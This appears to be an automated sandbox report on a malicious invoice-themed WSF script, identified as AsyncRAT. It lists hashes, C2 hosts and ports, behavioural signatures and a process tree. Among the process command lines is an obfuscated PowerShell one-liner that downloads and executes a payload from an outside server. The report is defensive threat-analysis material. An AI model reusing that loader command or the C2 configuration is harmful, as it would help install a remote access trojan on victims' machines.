Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20231023-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231023-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15/11/2023, 17:36

Static task: static1
Behavioral task: behavioral1
Sample: Invoice#57348024.wsf
Resource: win7-20231020-en
General
Target: Invoice#57348024.wsf
Size: 113KB
MD5: fa5cbc00cbaa12bb4b45fca8d5075587
SHA1: 5d4c9493654c9abd21354bb9f3424726ade1b8f3
SHA256: c57ecd0aeea0978f281e66541e3645290619eb8bc36882a2155c3cd61fee91af
SHA512: 0b1f0107e347b37f92de84dd8f277dda4cba2bec70f6342801b8c51c4efa216a16be68aeeac42f95b7d90c44e548a541c68488ce1242b6d04b777439c7bff219
SSDEEP: 768:H88888888888g88888888888Z88888888888V88888888888h88888888888g88t:u
Malware Config
Extracted
Family: asyncrat
3LOSH RAT
RxR*
C2:
rxrr.duckdns.org:6606
rxrr.duckdns.org:7707
rxrr.duckdns.org:8808
Mutex: AsyncMutex_86734khgs1
delay: 3
install: false
install_folder: %AppData%
Signatures

Async RAT payload (1 IoCs)
resource | yara_rule
behavioral2/memory/2708-40-0x0000000000400000-0x0000000000416000-memory.dmp | asyncrat

Blocklisted process makes network request (2 IoCs)
flow | pid | Process
5 | 2532 | WScript.exe
9 | 3380 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | WScript.exe (two identical entries)

Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 4748 set thread context of 2708 | 4748 | powershell.exe | 110

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (26 IoCs)
pid | Process
3380 | powershell.exe (2 entries)
4748 | powershell.exe (23 entries)
2708 | RegSvcs.exe (1 entry)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3380 | powershell.exe
Token: SeDebugPrivilege | 4748 | powershell.exe
Token: SeDebugPrivilege | 2708 | RegSvcs.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
2708 | RegSvcs.exe

Suspicious use of WriteProcessMemory (14 IoCs)
description | pid | Process | procid_target
PID 2532 wrote to memory of 3380 | 2532 | WScript.exe | 85 (2 entries)
PID 4828 wrote to memory of 1788 | 4828 | WScript.exe | 107 (2 entries)
PID 1788 wrote to memory of 4748 | 1788 | cmd.exe | 109 (2 entries)
PID 4748 wrote to memory of 2708 | 4748 | powershell.exe | 110 (8 entries)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\System32\WScript.exe (PID 2532)
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#57348024.wsf"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3380, child of 2532)
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WScript.exe (PID 4828)
  command line: C:\Windows\System32\WScript.exe "C:\Users\Public\libraries.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe (PID 1788, child of 4828)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\libraries.bat" "
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4748, child of 1788)
      command line: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\libraries.ps1'"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 2708, child of 4748)
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 1KB
MD5: 026d93a446c50e4ae9aa47a15d0e923f
SHA1: f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256: c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512: 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 210B
MD5: 440e905a6fcf6bcc0ffe763896e21044
SHA1: 89bf89ca871095dd7431147a4e0c993bfdba897e
SHA256: aae3e34c1f6bf5eaf7c91afec528d24ac1b10272705be506653b29df17d6e834
SHA512: f324dbff528e9579f81af84c09ab45ef87cd8e516cb22a5f99e432d4d1ca528f3e5d8f7a1f479076a89c18cd44bbaa10df4f6a1fcdc3fe8937febadb892d89fd

Filesize: 326KB
MD5: d253b8760d01942b6f0cf89884d8ce6f
SHA1: f5c10af0337c62aaf7403fb88cfe5671ef317d56
SHA256: 1c2e5ff87905fd9a30d3498c37374bcb9944caaf229dd8d9d85ffa25d3ab3ae4
SHA512: 77049aaa93bcba3a101b0f93571b3b633c2b98876655e63ba427219eb20fe7256f500edad9b840494ccddb5ca55f9baa8eec36020f099887fec86e4feadb8782

Filesize: 691B
MD5: 882c260115cfacc236251d065cc23c4c
SHA1: cee58dd936e493370224db57ca49c4d6c0cbfeff
SHA256: 1d1595fdd363891dd2d9d081059b2dcbca1edc72c80b6c637436a9090ba2564a
SHA512: d1279bcc0150ba96164445a98fdb5ff5ef6cde81460af71612ee0f0a7ac8155f9d3a73aa26ccb53a9da6493e078aef42e20ca26011f0f5aa855f5ced61236641